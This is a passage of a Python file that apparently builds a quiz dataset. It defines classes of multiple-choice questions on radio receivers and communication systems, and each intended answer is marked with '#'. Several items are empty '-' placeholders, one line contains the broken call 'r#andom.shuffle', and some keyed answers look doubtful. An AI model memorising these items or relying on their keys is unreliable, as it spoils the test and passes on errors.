selectivity'\n\t\tchoice_b = 'increases tracking problems #'\n\t\tchoice_c = 'decreases tracking problems'\n\t\tchoice_d = 'reduces adjacent channel rejection'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"High IF in a superheterodyne receiver\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_radio_receivers_section_2_49():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'cuts off an IF amplifier when the AGC is maximum'\n\t\tchoice_b = 'cuts off an IF amplifier when the AGC is minimum'\n\t\tchoice_c = 'cuts off an audio amplifier when the carrier is absent #'\n\t\tchoice_d = 'eliminates the RF interference when the signal is weak'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The typical squelch circuit \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_radio_receivers_section_2_50():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1.6 kbps'\n\t\tchoice_b = '16 kbps #'\n\t\tchoice_c = '32 kbps'\n\t\tchoice_d = '256 kbps'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A communication channel with additive white Gaussian noise, has a bandwidth of 4 kHz and an SNR of 15. Its channel capacity is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_1():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'duplex arrangement#'\n\t\tchoice_b = 'half duplex arrangement'\n\t\tchoice_c = 'both of the valid choices '\n\t\tchoice_d = 'none of the valid choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A cordless telephone using separate frequencies for transmission in base and portable units is known as\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_2():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'shunt capacitance #'\n\t\tchoice_b = 'series capacitance'\n\t\tchoice_c = 'inductance'\n\t\tchoice_d = 'resistance'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"For attenuation of high frequencies we should use\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_3():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'up to 100 bps'\n\t\tchoice_b = 'up to 250 bps'\n\t\tchoice_c = 'up to 400 bps'\n\t\tchoice_d = 'up to 600 bps #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A modem is classified as low speed if data rate handled is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_4():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'it reduces the bandwidth requirements to half #'\n\t\tchoice_b = 'it avoids phase distortion at low frequencies'\n\t\tchoice_c = 'it results in better reception'\n\t\tchoice_d = 'none of the valid choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"VSB modulation is preferred in TV because\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_5():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'low pass filter #'\n\t\tchoice_b = 'high pass filter'\n\t\tchoice_c = 'band pass filter'\n\t\tchoice_d = 'band stop filter'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A woofer should be fed from the input through a \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_6():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'frequency adjustment'\n\t\tchoice_b = 'frequency interleaving #'\n\t\tchoice_c = 'frequency changing'\n\t\tchoice_d = 'frequency amalgamation'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The color subcarrier and sidebands produced by its modulation with the chrominance signals are accomodated in the standard channel with by the process of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_7():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'mf'\n\t\tchoice_b = '3 mf #'\n\t\tchoice_c = 'mf / 3'\n\t\tchoice_d = 'mf / 9'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In FM signal with a modulation index of (mf) is passed through a frequency tripler. The wave in the output of the tripler will have a modulation index of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_8():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'detection'\n\t\tchoice_b = 'rectification'\n\t\tchoice_c = 'tuning #'\n\t\tchoice_d = 'detection and rectification'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In color TV receiver, varactor diodes are used for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_9():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '3 #'\n\t\tchoice_b = '2'\n\t\tchoice_c = '1'\n\t\tchoice_d = '4'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The number of noise sources in a BJT is(are)\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_10():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'does not depend on frequency'\n\t\tchoice_b = 'decreases as frequency is increased #'\n\t\tchoice_c = 'increases as frequency is increased'\n\t\tchoice_d = 'depends on temperature'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Energy content of atmospheric noise \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_11():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '400 W'\n\t\tchoice_b = '512 W #'\n\t\tchoice_c = '588 W'\n\t\tchoice_d = '650 W'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A 400 W carrier is amplitude modulated with m = 0.75. The total power in AM is \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_12():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '5 J_4(3)'\n\t\tchoice_b = '2.5 J_8(3)'\n\t\tchoice_c = '2.5 J_8(4)'\n\t\tchoice_d = '5 J_4(6) #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"c(t) and m(t) are used to generate an FM signal. If the peak frequency deviation of the generated FM signal is three times the transmission bandwidth of the AM signal, then the coefficient of the term [2pi (1008 x 10^3 t)] in the FM signal (in terms of Bessel coefficients) is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_13():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'PSK #'\n\t\tchoice_b = 'ASK'\n\t\tchoice_c = 'FSK'\n\t\tchoice_d = 'PSK and FSK'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Non-coherent detection is not possible for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_14():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'high transmitting power'\n\t\tchoice_b = 'very sensitive antenna'\n\t\tchoice_c = 'fully steerable antenna'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Tracking of extra-terrestrial objects require\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_15():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Both A and R are correct and R is a correct explanation of A #'\n\t\tchoice_b = 'Both A and R are correct but R is not a correct explanation of A'\n\t\tchoice_c = 'A is correct but R is wrong'\n\t\tchoice_d = 'A is wrong but R is correct'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Assertion: Free space does not interfere with normal radiation and propagation of radio waves.\nReason: Free space has no magnetic or gravitational fields.\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_16():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Power Return Factor'\n\t\tchoice_b = 'Pulse Return Factor'\n\t\tchoice_c = 'Pulse Repetition Factor #'\n\t\tchoice_d = 'Pulse Response Factor'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In radar systems PRF stands for\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_17():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'x(t) = 2 cos(t) + 3 cos(3t)'\n\t\tchoice_b = 'x(t) = 2 cos(pi t) + 7 cos(t)'\n\t\tchoice_c = 'x(t) = cos(t) + 0.5 #'\n\t\tchoice_d = 'x(t) = 2 cos(1.5 pi t) + sin(3.5 pi t)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following cannot be the Fourier series expansion of a periodic signal?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_18():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'reactance bipolar transistor modulator'\n\t\tchoice_b = 'armstrong modulator #'\n\t\tchoice_c = 'varactor diode modulator'\n\t\tchoice_d = 'reactance FM modulator'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following is the indirect way of FM generation?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_19():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '0.9'\n\t\tchoice_b = '10 / 9 #'\n\t\tchoice_c = '0.81'\n\t\tchoice_d = '0.1'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A telephone exchange has 9000 subscribers. If the number of calls originating at peak time is 10,000 in one hour, the calling rate is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_20():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'C = B log_2 (1 + S/N) #'\n\t\tchoice_b = 'C = 2 B log_2 (1 + S/N)'\n\t\tchoice_c = 'C = log_2 (1 + S/N)'\n\t\tchoice_d = 'C = B log_10 (1 + S/N)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If C is the capacity of a noisy channel in bits/second, B is the bandwidth in Hz, and S/N is the signal to noise ratio, then\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_21():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'decreases'\n\t\tchoice_b = 'increases #'\n\t\tchoice_c = 'remains the same'\n\t\tchoice_d = 'decreases or remains the same'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"As the frequency increases, the absorption of ground wave by earth's surface \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_22():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'is constant at all temperature'\n\t\tchoice_b = 'varies directly as temperature'\n\t\tchoice_c = 'varies inversely as the absolute temperature'\n\t\tchoice_d = 'varies directly as the square root of absolute temperature #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The velocity of sound waves in air\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_23():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1000 m'\n\t\tchoice_b = '500 m'\n\t\tchoice_c = '100 m #'\n\t\tchoice_d = '10 m'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The range of a cordless phone is about\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_24():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'one or two radials extending from base of tower at a depth of about 5 cm below the ground'\n\t\tchoice_b = 'a large number of radials extending from base of tower at a depth of about 3 m'\n\t\tchoice_c = 'a large number of radials extending from base of tower at a depth of about 30 cm #'\n\t\tchoice_d = 'none of the choices'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\tr#andom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"An earth mat for a communication tower consists of \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_25():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'Adding magnetism in mask and mounting frame'\n\t\tchoice_b = 'Removing residual magnetism in mask, sheild, etc. #'\n\t\tchoice_c = 'Increasing resistance of coils to decrease time constant'\n\t\tchoice_d = 'Decreasing resistance of coils to increase time constant'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Degaussing in a picture tube means\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_26():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'carrier frequency'\n\t\tchoice_b = 'bandwidth #'\n\t\tchoice_c = 'transmission loss'\n\t\tchoice_d = 'transmitted power'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"The rate at which information can be carried through a communication channel depends on \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_27():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'shunt traps'\n\t\tchoice_b = 'series traps'\n\t\tchoice_c = 'absorption traps'\n\t\tchoice_d = 'all of the choices #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Some types of traps used in video IF amplifier of color TV are\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_28():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_29():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '0.1'\n\t\tchoice_b = '0.7'\n\t\tchoice_c = '0.5 #'\n\t\tchoice_d = '0.35'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A carrier is simultaneously modulated by two sine waves having modulation indices of 0.4 and 0.3. The total modulation index would be\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_30():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1002 kHz'\n\t\tchoice_b = '1000 kHz #'\n\t\tchoice_c = '999.2 kHz'\n\t\tchoice_d = '998.0 kHz'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A 1000 kHz carrier is simultaneously modulated with 300 Hz, 800 Hz and 2 kHz audio sine waves. Which of the following frequencies is least likely to be present in the output?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_31():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'voltage and current nodes coincide'\n\t\tchoice_b = 'voltage and current antinodes coincide'\n\t\tchoice_c = 'voltage nodes and current antinodes as well as current nodes and voltage antinodes coincide #'\n\t\tchoice_d = 'both (a) and (b)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In the standing wave pattern on a transmission line\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_32():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '2'\n\t\tchoice_b = '3'\n\t\tchoice_c = '4 #'\n\t\tchoice_d = '6'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the bandwidth is increased by 2, the gamma(fm) gamma(am) ( where gamma is the ratio of SNR of output to SNR at input, FM is frequency modulation and AM is amplitude modulation)) is increased by a factor of\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_33():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '(a sin(2pi t)) / t '\n\t\tchoice_b = '(sin(2pit) / t) + (sin(pit)/t) cos(3pit)'\n\t\tchoice_c = '(sin(2pit) / t) + (sin(0.5pit) / t) cos(1/5 pi t) #'\n\t\tchoice_d = '(sin(2pit)/t) + (sin(pit) / t) cos(0.75 pi t)'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In the figure, m(t) = (2 sin(2pit)) / t, s(t) = cos (200 pi t) and n(t) = (sin (199pi t) / t), the output y(t) will be https://lesliecaminadecom.files.wordpress.com/2020/03/534-934-1.png\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_34():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_35():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'telegraphy #'\n\t\tchoice_b = 'telephony'\n\t\tchoice_c = 'satellite communication'\n\t\tchoice_d = 'radio transmission'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Frequency shift keying is used mostly in \"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_36():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'to use a balun'\n\t\tchoice_b = 'to use a single stub of adjustable position'\n\t\tchoice_c = 'to use a double stub #'\n\t\tchoice_d = 'to use a brodband amplifier'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"It is desired that transmission line and load should match for a range of frequencies. The best method is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\n\nclass ece_communication_systems_section_1_37():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'CE'\n\t\tchoice_b = 'CB'\n\t\tchoice_c = 'CC #'\n\t\tchoice_d = 'push pull'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Which of the following has the highest input impedance?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_38():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '1.92 ms #'\n\t\tchoice_b = '2.08 ms'\n\t\tchoice_c = '50 ms'\n\t\tchoice_d = '0.08 ms'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"In a facsimile reproduction time to scan one line is 2 ms. If it has 4% blanking, the visible trace time is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_39():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'I, II, III, IV'\n\t\tchoice_b = 'I, II, II #'\n\t\tchoice_c = 'II, III, IV'\n\t\tchoice_d = 'I, III, IV'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Consider the following statements\nI. The amplitude of an FM wave is constant\nII. FM is more immune to noise than AM\nII. FM broadcasts operate in upper VHF and UHF frequency types\nIV. FM transmitting and receiving equipments are simpler as compared to AM transmitter and receiving equipments.\nWhich of the statement above are correct?\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_40():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '0.5 Pa'\n\t\tchoice_b = '0.2 Pa'\n\t\tchoice_c = '0.1 Pa #'\n\t\tchoice_d = '0.01 Pa'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Signal to noise ratio of microphone is defined as the ratio of output when the sound pressure is _____ to the output in the absence of any sound signal\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_41():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'ZL = ZO'\n\t\tchoice_b = 'ZL < ZO'\n\t\tchoice_c = 'ZL > ZO'\n\t\tchoice_d = 'both (b) and (c) #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\t#random.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"A generator is feeding power to a transmission line of characteristic impedance Zo. The line is terminated in impedance ZL. Standing waves will be setup if\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_42():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_43():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '-'\n\t\tchoice_b = '-'\n\t\tchoice_c = '-'\n\t\tchoice_d = '-'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"-\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_44():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = 'amplitude modulation'\n\t\tchoice_b = 'frequency modulation #'\n\t\tchoice_c = 'both amplitude modulation and frequency modulation'\n\t\tchoice_d = 'neither amplitude modulation nor frequency modulation'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"Radio broadcasts are generally\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. {choices[1]}\nC. {choices[2]}\nD. {choices[3]}\"\"\"\n\nclass ece_communication_systems_section_1_45():\n\tdef __init__(self):\n\t\t\n\t\tchoice_a = '20 seconds'\n\t\tchoice_b = '2 seconds'\n\t\tchoice_c = '0.2 seconds'\n\t\tchoice_d = '0.05 seconds #'\n\t\t\n\t\tchoices = [choice_a, choice_b, choice_c, choice_d]\n\t\trandom.shuffle(choices)\n\t\t\n\t\t\n\t\tself.question = f\"\"\"If the frequency of a wave is 20 Hz, the time period is\"\"\"\n\t\tself.answer = f\"\"\"A. {choices[0]}\nB. 